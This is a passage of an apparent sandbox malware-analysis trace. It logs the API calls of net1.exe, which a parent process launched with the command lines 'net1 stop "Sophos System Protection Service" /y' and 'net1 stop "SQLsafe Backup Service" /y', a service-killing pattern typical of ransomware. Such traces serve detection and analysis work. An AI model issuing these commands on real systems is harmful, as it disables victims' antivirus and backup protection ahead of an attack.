System Protection Service") returned -10 [0085.180] _wcsicmp (_String1="sess", _String2="Sophos System Protection Service") returned -10 [0085.180] _wcsicmp (_String1="share", _String2="Sophos System Protection Service") returned -7 [0085.180] _wcsicmp (_String1="start", _String2="Sophos System Protection Service") returned 5 [0085.180] _wcsicmp (_String1="stats", _String2="Sophos System Protection Service") returned 5 [0085.180] _wcsicmp (_String1="statistics", _String2="Sophos System Protection Service") returned 5 [0085.180] _wcsicmp (_String1="stop", _String2="Sophos System Protection Service") returned 5 [0085.180] _wcsicmp (_String1="time", _String2="Sophos System Protection Service") returned 1 [0085.180] _wcsicmp (_String1="user", _String2="Sophos System Protection Service") returned 2 [0085.180] _wcsicmp (_String1="users", _String2="Sophos System Protection Service") returned 2 [0085.180] _wcsicmp (_String1="msg", _String2="Sophos System Protection Service") returned -6 [0085.181] _wcsicmp (_String1="messenger", _String2="Sophos System Protection Service") returned -6 [0085.181] _wcsicmp (_String1="receiver", _String2="Sophos System Protection Service") returned -1 [0085.181] _wcsicmp (_String1="rcv", _String2="Sophos System Protection Service") returned -1 [0085.181] _wcsicmp (_String1="netpopup", _String2="Sophos System Protection Service") returned -5 [0085.181] _wcsicmp (_String1="redirector", _String2="Sophos System Protection Service") returned -1 [0085.181] _wcsicmp (_String1="redir", _String2="Sophos System Protection Service") returned -1 [0085.181] _wcsicmp (_String1="rdr", _String2="Sophos System Protection Service") returned -1 [0085.181] _wcsicmp (_String1="workstation", _String2="Sophos System Protection Service") returned 4 [0085.181] _wcsicmp (_String1="work", _String2="Sophos System Protection Service") returned 4 [0085.181] _wcsicmp (_String1="wksta", _String2="Sophos System Protection Service") returned 4 [0085.181] _wcsicmp (_String1="prdr", _String2="Sophos System Protection Service") returned -3 [0085.181] _wcsicmp (_String1="devrdr", _String2="Sophos System Protection Service") returned -15 [0085.181] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos System Protection Service") returned -7 [0085.181] _wcsicmp (_String1="server", _String2="Sophos System Protection Service") returned -10 [0085.181] _wcsicmp (_String1="svr", _String2="Sophos System Protection Service") returned 7 [0085.181] _wcsicmp (_String1="srv", _String2="Sophos System Protection Service") returned 3 [0085.181] _wcsicmp (_String1="lanmanserver", _String2="Sophos System Protection Service") returned -7 [0085.181] _wcsicmp (_String1="alerter", _String2="Sophos System Protection Service") returned -18 [0085.181] _wcsicmp (_String1="netlogon", _String2="Sophos System Protection Service") returned -5 [0085.181] _wcsupr (in: _String="Sophos System Protection Service" | out: _String="SOPHOS SYSTEM PROTECTION SERVICE") returned="SOPHOS SYSTEM PROTECTION SERVICE" [0085.181] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x19ce50 [0085.185] GetServiceKeyNameW (in: hSCManager=0x19ce50, lpDisplayName="SOPHOS SYSTEM PROTECTION SERVICE", lpServiceName=0xffff5750, lpcchBuffer=0x12fb08 | out: lpServiceName="", lpcchBuffer=0x12fb08) returned 0 [0085.186] _wcsicmp (_String1="msg", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -6 [0085.186] _wcsicmp (_String1="messenger", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -6 [0085.186] _wcsicmp (_String1="receiver", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -1 [0085.186] _wcsicmp (_String1="rcv", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -1 [0085.186] _wcsicmp (_String1="redirector", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -1 [0085.186] _wcsicmp (_String1="redir", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -1 [0085.186] _wcsicmp (_String1="rdr", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -1 [0085.186] _wcsicmp (_String1="workstation", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned 4 [0085.186] _wcsicmp (_String1="work", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned 4 [0085.186] _wcsicmp (_String1="wksta", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned 4 [0085.186] _wcsicmp (_String1="prdr", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -3 [0085.186] _wcsicmp (_String1="devrdr", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -15 [0085.186] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -7 [0085.186] _wcsicmp (_String1="server", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -10 [0085.186] _wcsicmp (_String1="svr", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned 7 [0085.186] _wcsicmp (_String1="srv", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned 3 [0085.186] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -7 [0085.186] _wcsicmp (_String1="alerter", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -18 [0085.186] _wcsicmp (_String1="netlogon", _String2="SOPHOS SYSTEM PROTECTION SERVICE") returned -5 [0085.187] NetServiceControl (in: servername=0x0, service="SOPHOS SYSTEM PROTECTION SERVICE", opcode=0x0, arg=0x0, bufptr=0x12fb10 | out: bufptr=0x12fb10) returned 0x889 [0085.187] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0085.187] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0085.188] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0085.189] GetFileType (hFile=0xb) returned 0x2 [0085.189] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f9d8 | out: lpMode=0x12f9d8) returned 1 [0085.190] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f9d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x12f9d0*=0x1e) returned 1 [0085.190] GetFileType (hFile=0xb) returned 0x2 [0085.190] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f9d8 | out: lpMode=0x12f9d8) returned 1 [0085.190] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f9d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x12f9d0*=0x2) returned 1 [0085.190] _ultow (in: _Dest=0x889, _Radix=1243712 | out: _Dest=0x889) returned="2185" [0085.190] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0085.191] GetFileType (hFile=0xb) returned 0x2 [0085.191] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f9d8 | out: lpMode=0x12f9d8) returned 1 [0085.191] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f9d0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0x12f9d0*=0x34) returned 1 [0085.191] GetFileType (hFile=0xb) returned 0x2 [0085.191] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f9d8 | out: lpMode=0x12f9d8) returned 1 [0085.191] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f9d0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0x12f9d0*=0x2) returned 1 [0085.192] NetApiBufferFree (Buffer=0x19c120) returned 0x0 [0085.192] NetApiBufferFree (Buffer=0x19c140) returned 0x0 [0085.192] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos System Protection Service\" /y" [0085.192] exit (_Code=2) Process: id = "77" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21021000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0xe54" cmd_line = "C:\\Windows\\system32\\net1 stop \"SQLsafe Backup Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4454 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4455 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4456 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4457 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4458 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4459 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4460 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4461 start_va = 0xfffd0000 end_va = 0x100002fff entry_point = 0xfffd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4462 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4463 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4464 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4465 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4466 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4467 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4468 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4469 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4470 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4471 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4472 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4473 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4474 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4475 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4476 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4477 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4478 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4479 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4480 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4481 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4482 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4483 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4484 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4485 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4486 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4487 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4488 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4489 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4490 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4491 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4509 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 421 os_tid = 0xf54 [0085.088] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefe70 | out: lpSystemTimeAsFileTime=0xefe70*(dwLowDateTime=0xe7e30f30, dwHighDateTime=0x1d48689)) [0085.088] GetCurrentProcessId () returned 0xf38 [0085.088] GetCurrentThreadId () returned 0xf54 [0085.088] GetTickCount () returned 0x1f24a [0085.088] QueryPerformanceCounter (in: lpPerformanceCount=0xefe78 | out: lpPerformanceCount=0xefe78*=1813200600000) returned 1 [0085.089] GetModuleHandleW (lpModuleName=0x0) returned 0xfffd0000 [0085.090] __set_app_type (_Type=0x1) [0085.090] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfffe9c9c) returned 0x0 [0085.090] __getmainargs (in: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788, _DoWildCard=0, _StartInfo=0xffff479c | out: _Argc=0xffff4780, _Argv=0xffff4790, _Env=0xffff4788) returned 0 [0085.090] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.090] GetConsoleOutputCP () returned 0x1b5 [0085.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffffcec0 | out: lpCPInfo=0xffffcec0) returned 1 [0085.090] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0085.092] sprintf_s (in: _DstBuf=0xefe18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0085.093] setlocale (category=0, locale=".437") returned="English_United States.437" [0085.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0085.193] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.193] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"SQLsafe Backup Service\" /y" [0085.194] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefbb0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0085.194] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0085.194] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe08 | out: Buffer=0xefe08*=0x2ac0f0) returned 0x0 [0085.194] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefe08 | out: Buffer=0xefe08*=0x2ac110) returned 0x0 [0085.194] _fileno (_File=0x7fefdba2a80) returned 0 [0085.194] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0085.194] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0085.194] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0085.194] _wcsicmp (_String1="config", _String2="stop") returned -16 [0085.194] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0085.194] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0085.194] _wcsicmp (_String1="file", _String2="stop") returned -13 [0085.194] _wcsicmp (_String1="files", _String2="stop") returned -13 [0085.194] _wcsicmp (_String1="group", _String2="stop") returned -12 [0085.194] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0085.194] _wcsicmp (_String1="help", _String2="stop") returned -11 [0085.194] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0085.194] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0085.194] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0085.194] _wcsicmp (_String1="session", _String2="stop") returned -15 [0085.194] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0085.194] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0085.194] _wcsicmp (_String1="share", _String2="stop") returned -12 [0085.195] _wcsicmp (_String1="start", _String2="stop") returned -14 [0085.195] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0085.195] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0085.195] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0085.195] _wcsicmp (_String1="accounts", _String2="SQLsafe Backup Service") returned -18 [0085.195] _wcsicmp (_String1="computer", _String2="SQLsafe Backup Service") returned -16 [0085.195] _wcsicmp (_String1="config", _String2="SQLsafe Backup Service") returned -16 [0085.195] _wcsicmp (_String1="continue", _String2="SQLsafe Backup Service") returned -16 [0085.195] _wcsicmp (_String1="cont", _String2="SQLsafe Backup Service") returned -16 [0085.195] _wcsicmp (_String1="file", _String2="SQLsafe Backup Service") returned -13 [0085.195] _wcsicmp (_String1="files", _String2="SQLsafe Backup Service") returned -13 [0085.195] _wcsicmp (_String1="group", _String2="SQLsafe Backup Service") returned -12 [0085.195] _wcsicmp (_String1="groups", _String2="SQLsafe Backup Service") returned -12 [0085.195] _wcsicmp (_String1="help", _String2="SQLsafe Backup Service") returned -11 [0085.195] _wcsicmp (_String1="helpmsg", _String2="SQLsafe Backup Service") returned -11 [0085.195] _wcsicmp (_String1="localgroup", _String2="SQLsafe Backup Service") returned -7 [0085.195] _wcsicmp (_String1="pause", _String2="SQLsafe Backup Service") returned -3 [0085.195] _wcsicmp (_String1="session", _String2="SQLsafe Backup Service") returned -12 [0085.195] _wcsicmp (_String1="sessions", _String2="SQLsafe Backup Service") returned -12 [0085.195] _wcsicmp (_String1="sess", _String2="SQLsafe Backup Service") returned -12 [0085.195] _wcsicmp (_String1="share", _String2="SQLsafe Backup Service") returned -9 [0085.195] _wcsicmp (_String1="start", _String2="SQLsafe Backup Service") returned 3 [0085.195] _wcsicmp (_String1="stats", _String2="SQLsafe Backup Service") returned 3 [0085.195] _wcsicmp (_String1="statistics", _String2="SQLsafe Backup Service") returned 3 [0085.195] _wcsicmp (_String1="stop", _String2="SQLsafe Backup Service") returned 3 [0085.195] _wcsicmp (_String1="time", _String2="SQLsafe Backup Service") returned 1 [0085.195] _wcsicmp (_String1="user", _String2="SQLsafe Backup Service") returned 2 [0085.195] _wcsicmp (_String1="users", _String2="SQLsafe Backup Service") returned 2 [0085.195] _wcsicmp (_String1="msg", _String2="SQLsafe Backup Service") returned -6 [0085.195] _wcsicmp (_String1="messenger", _String2="SQLsafe Backup Service") returned -6 [0085.195] _wcsicmp (_String1="receiver", _String2="SQLsafe Backup Service") returned -1 [0085.195] _wcsicmp (_String1="rcv", _String2="SQLsafe Backup Service") returned -1 [0085.195] _wcsicmp (_String1="netpopup", _String2="SQLsafe Backup Service") returned -5 [0085.195] _wcsicmp (_String1="redirector", _String2="SQLsafe Backup Service") returned -1 [0085.195] _wcsicmp (_String1="redir", _String2="SQLsafe Backup Service") returned -1 [0085.195] _wcsicmp (_String1="rdr", _String2="SQLsafe Backup Service") returned -1 [0085.195] _wcsicmp (_String1="workstation", _String2="SQLsafe Backup Service") returned 4 [0085.195] _wcsicmp (_String1="work", _String2="SQLsafe Backup Service") returned 4 [0085.195] _wcsicmp (_String1="wksta", _String2="SQLsafe Backup Service") returned 4 [0085.195] _wcsicmp (_String1="prdr", _String2="SQLsafe Backup Service") returned -3 [0085.195] _wcsicmp (_String1="devrdr", _String2="SQLsafe Backup Service") returned -15 [0085.195] _wcsicmp (_String1="lanmanworkstation", _String2="SQLsafe Backup Service") returned -7 [0085.196] _wcsicmp (_String1="server", _String2="SQLsafe Backup Service") returned -12 [0085.196] _wcsicmp (_String1="svr", _String2="SQLsafe Backup Service") returned 5 [0085.196] _wcsicmp (_String1="srv", _String2="SQLsafe Backup Service") returned 1 [0085.196] _wcsicmp (_String1="lanmanserver", _String2="SQLsafe Backup Service") returned -7 [0085.196] _wcsicmp (_String1="alerter", _String2="SQLsafe Backup Service") returned -18 [0085.196] _wcsicmp (_String1="netlogon", _String2="SQLsafe Backup Service") returned -5 [0085.196] _wcsupr (in: _String="SQLsafe Backup Service" | out: _String="SQLSAFE BACKUP SERVICE") returned="SQLSAFE BACKUP SERVICE" [0085.196] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ace20 [0085.199] GetServiceKeyNameW (in: hSCManager=0x2ace20, lpDisplayName="SQLSAFE BACKUP SERVICE", lpServiceName=0xffff5750, lpcchBuffer=0xefd28 | out: lpServiceName="", lpcchBuffer=0xefd28) returned 0 [0085.200] _wcsicmp (_String1="msg", _String2="SQLSAFE BACKUP SERVICE") returned -6 [0085.200] _wcsicmp (_String1="messenger", _String2="SQLSAFE BACKUP SERVICE") returned -6 [0085.200] _wcsicmp (_String1="receiver", _String2="SQLSAFE BACKUP SERVICE") returned -1 [0085.200] _wcsicmp (_String1="rcv", _String2="SQLSAFE BACKUP SERVICE") returned -1 [0085.200] _wcsicmp (_String1="redirector", _String2="SQLSAFE BACKUP SERVICE") returned -1 [0085.200] _wcsicmp (_String1="redir", _String2="SQLSAFE BACKUP SERVICE") returned -1 [0085.200] _wcsicmp (_String1="rdr", _String2="SQLSAFE BACKUP SERVICE") returned -1 [0085.201] _wcsicmp (_String1="workstation", _String2="SQLSAFE BACKUP SERVICE") returned 4 [0085.201] _wcsicmp (_String1="work", _String2="SQLSAFE BACKUP SERVICE") returned 4 [0085.201] _wcsicmp (_String1="wksta", _String2="SQLSAFE BACKUP SERVICE") returned 4 [0085.201] _wcsicmp (_String1="prdr", _String2="SQLSAFE BACKUP SERVICE") returned -3 [0085.201] _wcsicmp (_String1="devrdr", _String2="SQLSAFE BACKUP SERVICE") returned -15 [0085.201] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSAFE BACKUP SERVICE") returned -7 [0085.201] _wcsicmp (_String1="server", _String2="SQLSAFE BACKUP SERVICE") returned -12 [0085.201] _wcsicmp (_String1="svr", _String2="SQLSAFE BACKUP SERVICE") returned 5 [0085.201] _wcsicmp (_String1="srv", _String2="SQLSAFE BACKUP SERVICE") returned 1 [0085.201] _wcsicmp (_String1="lanmanserver", _String2="SQLSAFE BACKUP SERVICE") returned -7 [0085.201] _wcsicmp (_String1="alerter", _String2="SQLSAFE BACKUP SERVICE") returned -18 [0085.201] _wcsicmp (_String1="netlogon", _String2="SQLSAFE BACKUP SERVICE") returned -5 [0085.201] NetServiceControl (in: servername=0x0, service="SQLSAFE BACKUP SERVICE", opcode=0x0, arg=0x0, bufptr=0xefd30 | out: bufptr=0xefd30) returned 0x889 [0085.201] wcscpy_s (in: _Destination=0xffff80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0085.201] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0085.202] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0085.203] GetFileType (hFile=0xb) returned 0x2 [0085.203] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbf8 | out: lpMode=0xefbf8) returned 1 [0085.204] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefbf0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0xefbf0*=0x1e) returned 1 [0085.204] GetFileType (hFile=0xb) returned 0x2 [0085.204] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbf8 | out: lpMode=0xefbf8) returned 1 [0085.204] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefbf0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, lpNumberOfCharsWritten=0xefbf0*=0x2) returned 1 [0085.204] _ultow (in: _Dest=0x889, _Radix=982112 | out: _Dest=0x889) returned="2185" [0085.204] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffff5b50, nSize=0x800, Arguments=0xffff7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0085.205] GetFileType (hFile=0xb) returned 0x2 [0085.205] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbf8 | out: lpMode=0xefbf8) returned 1 [0085.205] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffff5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefbf0, lpReserved=0x0 | out: lpBuffer=0xffff5b50*, lpNumberOfCharsWritten=0xefbf0*=0x34) returned 1 [0085.205] GetFileType (hFile=0xb) returned 0x2 [0085.205] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefbf8 | out: lpMode=0xefbf8) returned 1 [0085.206] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfffd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefbf0, lpReserved=0x0 | out: lpBuffer=0xfffd1efc*, 